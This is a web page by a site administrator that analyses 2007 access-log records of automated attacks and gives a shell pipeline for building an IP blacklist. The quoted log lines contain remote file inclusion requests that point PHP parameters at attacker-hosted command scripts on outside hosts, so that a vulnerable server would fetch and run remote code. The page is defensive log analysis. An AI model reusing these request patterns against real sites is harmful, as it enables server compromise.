|
Softpanorama |
May the source be with you, but remember the KISS principle ;-)
|
| May | June | July | August | September | Novemebr | October | Decemeber |
Recently the number of "strange" access record in web logs jumped and it became interesting to analyze the logs and see what those people are doing. Here is one fragment that I have found manually:
213.195.77.225 - - [23/Jun/2007:06:00:07 -0700] "GET /Lang/Cilorama/c_%3Cwbr%20/%3Elanguage.shtml/str.php?lang=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 383 "-" "libwww-perl/5.79" 213.195.77.225 - - [23/Jun/2007:06:00:07 -0700] "GET /str.php?lang=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 339 "-" "libwww-perl/5.79" 213.195.77.225 - - [23/Jun/2007:06:00:08 -0700] "GET /Lang/Cilorama/c_%3Cwbr%20/str.php?lang=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 364 "-" "libwww-perl/5.79" 213.195.77.225 - - [23/Jun/2007:06:08:12 -0700] "GET /Scripting/Phprama/%3Cwbr%20/%3Ecommand_line_php.shtml/str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 393 "-" "libwww-perl/5.79" 213.195.77.225 - - [23/Jun/2007:06:08:13 -0700] "GET /str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 339 "-" "libwww-perl/5.79" 213.195.77.225 - - [23/Jun/2007:06:08:13 -0700] "GET /Scripting/Phprama/%3Cwbr%20/str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 366 "-" "libwww-perl/5.79" 66.230.197.170 - - [23/Jun/2007:06:25:53 -0700] "GET /str.php?l=http://zarafshan.ru/uploads/cmd.txt? HTTP/1.1" 406 339 "-" "libwww-perl/5.805" 24.117.228.198 - - [23/Jun/2007:06:27:48 -0700] "GET /load_lang.php?_SERWEB[serwebdir]=http://dezzign.ru/echo? HTTP/1.1" 404 168 "-" "libwww-perl/5.803"
One common thing for those record is the usage of libwww.perl. Greping on this string brings us more complete picture reproduced in Zombies bulletin
Extracting IP addresses gives you the first draft of the "blacklist" and that top dozen can be used to block those rogue addresses from accessing your site. To get such a "dirty dozen" you can use a simple pipe which can be made into a function or shell script:
grep 'libwww.perl' $1 | cut -d' ' -f 1 | sort -n | uniq -c | sort -rn | head -12 > $1.dirty
Below are the results of processing of the list from above:
20 83.149.125.174 home.w-sieci.pl 18 80.67.20.21 mayermail.de 12 200.69.222.122 contactar01.gestionarnet.com 11 64.78.163.2 nickentgolf.com 11 62.193.224.166 wpc0230.amenworld.com 10 86.109.161.201 lincl239.ns1.couldix.com 9 87.230.2.113 lvps87-230-2-113.dedicated.hosteurope.de 9 85.214.55.73 mind-creations.net 7 193.192.249.157 6 87.118.96.254 ns.km22206-02.keymachine.de 6 72.55.153.108 ip-72-55-153-108.static.privatedns.com 6 66.147.239.104 host.1sbs.com 6 216.246.52.59 server.dynasoft.com.ph 6 213.195.77.225 225.77.195.213.ibercom.com 5 217.115.197.51 node11.cluster.nxs.nl
Copyright © 1996-2008 by Dr. Nikolai Bezroukov. www.softpanorama.org was created as a service to the UN Sustainable Development Networking Programme (SDNP) in the author free time. Submit comments This document is an industrial compilation designed and created exclusively for educational use and is placed under the copyright of the Open Content License(OPL). Original materials copyright belong to respective owners. Quotes are made for educational purposes only in compliance with the fair use doctrine.
Standard disclaimer: The statements, views and opinions presented on this web page are those of the author and are not endorsed by, nor do they necessarily reflect, the opinions of the author present and former employers, SDNP or any other organization the author may be associated with. We do not warrant the correctness of the information provided or its fitness for any purpose.
Last modified: February 28, 2008